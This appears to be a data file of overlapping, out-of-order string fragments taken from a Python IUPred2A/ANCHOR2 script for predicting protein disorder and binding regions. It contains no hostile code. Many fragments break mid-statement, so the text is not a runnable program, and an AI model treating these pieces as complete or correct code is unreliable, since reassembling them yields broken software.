"= 0 kk = k + 1 if gr: beg = gr[0][0] end",
"in_gr: beg = idx end = idx in_gr = True if in_gr: gr.append({0:",
"and iupred_scores[idx] < par_c: sign = -1 corr = 0 if iupred_scores[idx] >",
"if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1]",
"aa, freq in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx]",
"1, i[0] + 1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx,",
"return _mtx def read_histo(histo_file): hist = [] h_min = float(\"inf\") h_max = -float(\"inf\")",
"beg, end = 0, 0 for idx, val in enumerate(weighted_energy_score): if in_gr and",
"beg + 1 < 35: k += 1 if k < nr: beg",
"sys import textwrap import math import os from Bio import SeqIO def avg(lst):",
"if energy_gain[idx] < par_b and iupred_scores[idx] < par_c: sign = -1 corr =",
"beg = gr[k][0] end = gr[kk][1] kk += 1 elif end - beg",
"freq except KeyError: unweighted_energy_score[idx] += 0 if mode == 'short': for idx in",
"else: mgr.append({0: beg, 1: end}) k = kk kk += 1 if k",
"read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc = 1 uc = 100 wc =",
"mgr = [] k = 0 kk = k + 1 if gr:",
"sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not",
"= 1 elif val >= histo_max - 2 * histo_step: iupred_score[idx] = 0",
"(anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options)",
"\\t-d str - Location of data directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0])",
"prediction of protein disorder as a function of redox state and protein binding",
"weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score",
"for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window",
"+ window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq = \"\" with open(fasta_file)",
"= \"\" if mode == 'glob': gr = [] in_gr = False beg,",
"+= 1 elif end - beg + 1 < 35: k += 1",
"freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] +=",
"= [0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx -",
"* freq except KeyError: local_energy_score[idx] += 0 for aa, freq in interface_comp.items(): try:",
"os from Bio import SeqIO def avg(lst): return sum(lst) / len(lst) def aa_freq(_seq):",
"window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq = \"\" with open(fasta_file) as",
"n, i in enumerate(mgr): glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0]",
"= k + 1 if gr: beg = gr[0][0] end = gr[0][1] nr",
"val in enumerate(weighted_energy_score): if val <= histo_min + 2 * histo_step: iupred_score[idx] =",
"of data directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2:",
"freq in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx] +=",
"= 1 uc = 25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min,",
"kk < nr and gr[kk][0] - end < 45: beg = gr[k][0] end",
"elif in_gr: end += 1 if val > 0.3 and not in_gr: beg",
"gr[0][1] nr = len(gr) while k < nr: if kk < nr and",
"/ len(_seq) return _freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\") as",
"= \" \".join([res[i:i + 10] for i in range(0, len(res), 10)]) glob_text +=",
"gr[0][0] end = gr[0][1] nr = len(gr) while k < nr: if kk",
"iupred_limit and energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx] - par_c)) +",
"= read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score = [0] * len(seq) iupred_score",
"- (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as",
"read_seq(fasta_file): _seq = \"\" with open(fasta_file) as file_handler: for _line in file_handler: if",
"print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue",
"os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in",
"= seq.lower() nr = 0 res = \"\" for i in mgr: res",
"def iupred(seq, mode): if mode == \"short\": lc = 1 uc = 25",
"lc = 1 uc = 25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo,",
"gr[k][0] end = gr[kk][1] kk += 1 elif end - beg + 1",
"* histo_step: iupred_score[idx] = 1 elif val >= histo_max - 2 * histo_step:",
"= smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0] * len(seq) for idx in range(len(seq)):",
"= 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode",
"avg(lst): return sum(lst) / len(lst) def aa_freq(_seq): _freq = {} for _aa in",
"in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] += 0",
"* len(seq) weighted_energy_score = [0] * len(seq) iupred_score = [0] * len(seq) for",
"python3 import sys import textwrap import math import os from Bio import SeqIO",
"= aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx + lc +",
"end}) in_gr = False elif in_gr: end += 1 if val > 0.3",
"+ 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\" if mode ==",
"k < nr: beg = gr[k][0] end = gr[k][1] seq = seq.lower() nr",
"simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: # Print individual sequence",
"par_b = 0.26 par_c = 0.43 iupred_limit = par_c - (par_a / par_b)",
"+= \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if val <= histo_min +",
"help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if '-d'",
"sequences: # Print individual sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence,",
"_fn: for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq)",
"iupred_score = [0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx",
"+ 1, i[0] + 1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for",
"/ par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for",
"not found at {}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') +",
"= float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score = [0] * len(seq) energy_gain",
"histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc = 100 wc =",
"> 0.3 and not in_gr: beg = idx end = idx in_gr =",
"uc = 100 wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step",
"0 kk = k + 1 if gr: beg = gr[0][0] end =",
"domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr): glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n",
"= [0] * len(seq) for idx in range(len(seq)): sign = 1 if energy_gain[idx]",
"_line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max:",
"in range(len(seq)): sign = 1 if energy_gain[idx] < par_b and iupred_scores[idx] < par_c:",
"idx, val in enumerate(weighted_energy_score): if val <= histo_min + 2 * histo_step: iupred_score[idx]",
"h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min) / (len(hist)) return hist,",
"0, 0 for idx, val in enumerate(weighted_energy_score): if in_gr and val <= 0.3:",
"iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))]",
"1 for _aa, _ins in _freq.items(): _freq[_aa] = _ins / len(_seq) return _freq",
"def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size = 30 local_smoothing_window = 5 par_a",
"anchor_score[idx] = sign * (energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c)",
"if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx]",
"= idx end = idx in_gr = True if in_gr: gr.append({0: beg, 1:",
"val in enumerate(weighted_energy_score): if in_gr and val <= 0.3: gr.append({0: beg, 1: end})",
"+ local_window_size + 1]) for aa, freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa]",
"0.3 and not in_gr: beg = idx end = idx in_gr = True",
"mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in",
"for idx in range(len(seq)): for idx2 in range(idx - wc, idx + wc",
"SeqIO def avg(lst): return sum(lst) / len(lst) def aa_freq(_seq): _freq = {} for",
"Location of data directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) <",
"parser to support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence",
"read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score",
"1)]) return weighted_energy_score def read_seq(fasta_file): _seq = \"\" with open(fasta_file) as file_handler: for",
"(-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage:",
"if '-a' in sys.argv: if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else:",
"print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\")",
"import math import os from Bio import SeqIO def avg(lst): return sum(lst) /",
"mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1",
"_seq def iupred(seq, mode): if mode == \"short\": lc = 1 uc =",
"elif val >= histo_max - 2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx]",
"[0] * len(seq) weighted_energy_score = [0] * len(seq) iupred_score = [0] * len(seq)",
"and energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx] - par_c)) + par_b",
"+ wc + 1): if idx2 < 0 or idx2 >= len(seq): weighted_energy_score[idx]",
"local_smoothing_window = 5 par_a = 0.0013 par_b = 0.26 par_c = 0.43 iupred_limit",
"import textwrap import math import os from Bio import SeqIO def avg(lst): return",
"mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1] + 1",
"'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else:",
"beg = gr[k][0] end = gr[k][1] else: mgr.append({0: beg, 1: end}) k =",
"energy_gain = [0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx",
"= 0 if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0: corr = (par_a",
"uc + 1]) for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] *",
"k + 1 if gr: beg = gr[0][0] end = gr[0][1] nr =",
"* histo_step: iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1",
"anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred type) \\tAvailable",
"+ 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg))",
"Acids Research 2018;46(W1):W329-W337. # # Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1])) # Add",
"_mtx def read_histo(histo_file): hist = [] h_min = float(\"inf\") h_max = -float(\"inf\") with",
"in_gr = False elif in_gr: end += 1 if val > 0.3 and",
"= gr[k][1] seq = seq.lower() nr = 0 res = \"\" for i",
"= anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob':",
"enumerate(weighted_energy_score): if in_gr and val <= 0.3: gr.append({0: beg, 1: end}) in_gr =",
"KeyError: interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size)",
"from Bio import SeqIO def avg(lst): return sum(lst) / len(lst) def aa_freq(_seq): _freq",
"window): weighted_energy_score = [0] * len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0,",
"in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx",
"uc):max(0, idx - lc)] + seq[idx + lc + 1:idx + uc +",
"gr[k][1] else: mgr.append({0: beg, 1: end}) k = kk kk += 1 if",
"energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0] * len(seq) for idx in",
"anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size = 30 local_smoothing_window = 5 par_a =",
"interface_energy_score = [0] * len(seq) energy_gain = [0] * len(seq) for idx in",
"redox state and protein binding # <NAME>, <NAME>, <NAME> # Nucleic Acids Research",
"+= 1 if val > 0.3 and not in_gr: beg = idx end",
"idx end = idx in_gr = True if in_gr: gr.append({0: beg, 1: end})",
"while k < nr: if kk < nr and gr[kk][0] - end <",
"_ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\")",
"(default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if not",
"histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score = [0]",
"if len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found",
"range(len(seq)): for idx2 in range(idx - wc, idx + wc + 1): if",
"glob_text += \"Number of globular domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr): glob_text",
"in range(0, len(res), 10)]) glob_text += \"Number of globular domains: {}\\n\".format(len(mgr)) for n,",
"end = gr[kk][1] kk += 1 elif end - beg + 1 <",
"corr - par_b) * (iupred_scores[idx] - par_c) anchor_score[idx] = 1 / (1 +",
"avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score def read_seq(fasta_file):",
"0 if mode == 'short': for idx in range(len(seq)): for idx2 in range(idx",
"globular domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr): glob_text += \" globular domain",
"iupred_score[idx] = 1 elif val >= histo_max - 2 * histo_step: iupred_score[idx] =",
"mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx] += 0 for aa, freq in interface_comp.items():",
"2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at {}!\\n{}'.format(sys.argv[-2], help_msg))",
"protein disorder as a function of redox state and protein binding # <NAME>,",
"idx + window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq = \"\" with",
"local_window_size = 41 iupred_window_size = 30 local_smoothing_window = 5 par_a = 0.0013 par_b",
"= [0] * len(seq) energy_gain = [0] * len(seq) for idx in range(len(seq)):",
"- Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input",
"help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\"",
"= {} with open(matrix_file, \"r\") as _fhm: for _line in _fhm: if _line.split()[0]",
"local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score",
"in_gr and val <= 0.3: gr.append({0: beg, 1: end}) in_gr = False elif",
"= 100 wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step =",
"\\\"glob\\\" Options \\t-d str - Location of data directory (default='./') \\t-a - Enable",
"= 30 local_smoothing_window = 5 par_a = 0.0013 par_b = 0.26 par_c =",
"0: corr = (par_a / (iupred_scores[idx] - par_c)) + par_b anchor_score[idx] = sign",
"gr[kk][1] kk += 1 elif end - beg + 1 < 35: k",
"beg, 1: end}) k = kk kk += 1 if k < nr:",
"par_c = 0.43 iupred_limit = par_c - (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH))",
"h_step def smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list) for idx in range(len(energy_list)):",
"- h_min) / (len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score",
"-1 corr = 0 if iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0: corr",
"len(res), 10)]) glob_text += \"Number of globular domains: {}\\n\".format(len(mgr)) for n, i in",
"- histo_min) * (1 / histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size",
"0 res = \"\" for i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1]",
"par_c)) + par_b anchor_score[idx] = sign * (energy_gain[idx] + corr - par_b) *",
"== 'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if",
"if k < nr: beg = gr[k][0] end = gr[k][1] else: mgr.append({0: beg,",
"* len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx",
"open(histo_file, \"r\") as fnh: for _line in fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1])",
"seq = seq.lower() nr = 0 res = \"\" for i in mgr:",
"str - Location of data directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if",
"(iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str - Location of",
"{}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short', 'long', 'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1],",
"Add SeqIO parser to support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\")",
"'long': anchor2_res = anchor2(sequence, iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1]",
"= \"\" with open(fasta_file) as file_handler: for _line in file_handler: if _line.startswith(\">\"): continue",
"iupred_scores[idx] > iupred_limit and energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx] -",
"kk = k + 1 if gr: beg = gr[0][0] end = gr[0][1]",
"in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx] += 0",
"IUPred2A: context-dependent prediction of protein disorder as a function of redox state and",
"= 1 for _aa, _ins in _freq.items(): _freq[_aa] = _ins / len(_seq) return",
"for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)]",
"line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score =",
"local_smoothing_window), local_smoothing_window) anchor_score = [0] * len(seq) for idx in range(len(seq)): sign =",
"import os from Bio import SeqIO def avg(lst): return sum(lst) / len(lst) def",
"<NAME>, <NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction type: {}",
"par_c - (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH))",
"for _aa in _seq: if _aa in _freq: _freq[_aa] += 1 else: _freq[_aa]",
"len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx +",
"+ seq[idx + 2:idx + local_window_size + 1]) for aa, freq in freq_dct.items():",
"- wc, idx + wc + 1): if idx2 < 0 or idx2",
"len(range(idx - wc, idx + wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc)",
"for idx, val in enumerate(weighted_energy_score): if in_gr and val <= 0.3: gr.append({0: beg,",
"interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score = [0] * len(seq)",
"unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx - wc, idx + wc + 1)) else: weighted_energy_score",
"[] in_gr = False beg, end = 0, 0 for idx, val in",
"'glob': gr = [] in_gr = False beg, end = 0, 0 for",
"res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1] + 1 res",
"histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score = [0] * len(seq)",
"+ 1]) for aa, freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq",
"h_step = (h_max - h_min) / (len(hist)) return hist, h_min, h_max, h_step def",
"h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step",
"float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max = float(_line.split()[1])",
"<NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction type: {} #",
"10] for i in range(0, len(res), 10)]) glob_text += \"Number of globular domains:",
"predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not",
"/= len(range(idx - wc, idx + wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score,",
"sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH,",
"_ins in _freq.items(): _freq[_aa] = _ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx",
"as _fhm: for _line in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2])",
"mode == \"short\": lc = 1 uc = 25 wc = 10 mtx",
"< nr: beg = gr[k][0] end = gr[k][1] else: mgr.append({0: beg, 1: end})",
"lc = 1 uc = 100 wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo,",
"{} for _aa in _seq: if _aa in _freq: _freq[_aa] += 1 else:",
"in ['short', 'long', 'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message",
"return hist, h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list)",
"idx - window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq",
"iupred(sequence, sys.argv[-1]) if '-a' in sys.argv: if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence,",
"in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos",
"- Location of data directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv)",
"len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx -",
"aa_freq(_seq): _freq = {} for _aa in _seq: if _aa in _freq: _freq[_aa]",
"else: lc = 1 uc = 100 wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH))",
"'-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data",
"in range(idx - wc, idx + wc + 1): if idx2 < 0",
"0.0013 par_b = 0.26 par_c = 0.43 iupred_limit = par_c - (par_a /",
"+= seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1] + 1 res +=",
"= 5 par_a = 0.0013 par_b = 0.26 par_c = 0.43 iupred_limit =",
"[0] * len(seq) for idx in range(len(seq)): sign = 1 if energy_gain[idx] <",
"35: k += 1 if k < nr: beg = gr[k][0] end =",
"30 local_smoothing_window = 5 par_a = 0.0013 par_b = 0.26 par_c = 0.43",
"= len(gr) while k < nr: if kk < nr and gr[kk][0] -",
"= read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc = 100 wc = 10 mtx",
"False elif in_gr: end += 1 if val > 0.3 and not in_gr:",
"as _fn: for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] *",
"_line.startswith(\">\"): continue _seq += _line.strip() return _seq def iupred(seq, mode): if mode ==",
"float(_line.split()[2]) return _mtx def read_histo(histo_file): hist = [] h_min = float(\"inf\") h_max =",
"- 1)] + seq[idx + 2:idx + local_window_size + 1]) for aa, freq",
"- interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score =",
"(seqfile) (iupred type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str - Location",
"type) \\tAvailable types: \\\"long\\\", \\\"short\\\", \\\"glob\\\" Options \\t-d str - Location of data",
"uc = 25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step",
"gr: beg = gr[0][0] end = gr[0][1] nr = len(gr) while k <",
"_seq = \"\" with open(fasta_file) as file_handler: for _line in file_handler: if _line.startswith(\">\"):",
"* (1 / histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size = 41",
"= avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score def",
"<= histo_min + 2 * histo_step: iupred_score[idx] = 1 elif val >= histo_max",
"_aa in _freq: _freq[_aa] += 1 else: _freq[_aa] = 1 for _aa, _ins",
"idx - uc):max(0, idx - lc)] + seq[idx + lc + 1:idx +",
"histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc = 100 wc",
"len(seq) iupred_score = [0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0,",
"mode == 'short': for idx in range(len(seq)): for idx2 in range(idx - wc,",
"_freq = {} for _aa in _seq: if _aa in _freq: _freq[_aa] +=",
"0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))] return iupred_score,",
"0.43 iupred_limit = par_c - (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp =",
"else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))] return iupred_score, glob_text",
"- par_b) * (iupred_scores[idx] - par_c) anchor_score[idx] = 1 / (1 + math.e",
"0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred",
"fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if float(_line.split()[1])",
"unweighted_energy_score = [0] * len(seq) weighted_energy_score = [0] * len(seq) iupred_score = [0]",
"{}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if",
"end}) mgr = [] k = 0 kk = k + 1 if",
"_mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def",
"if in_gr and val <= 0.3: gr.append({0: beg, 1: end}) in_gr = False",
"histo_min) * (1 / histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size =",
"in range(len(seq)): for idx2 in range(idx - wc, idx + wc + 1):",
"ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file",
"_freq[_aa] += 1 else: _freq[_aa] = 1 for _aa, _ins in _freq.items(): _freq[_aa]",
"* freq except KeyError: unweighted_energy_score[idx] += 0 if mode == 'short': for idx",
"for i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr =",
"** (-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg =",
"+ 1 res += seq[nr:] res = \" \".join([res[i:i + 10] for i",
"gr = [] in_gr = False beg, end = 0, 0 for idx,",
"in _freq.items(): _freq[_aa] = _ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx =",
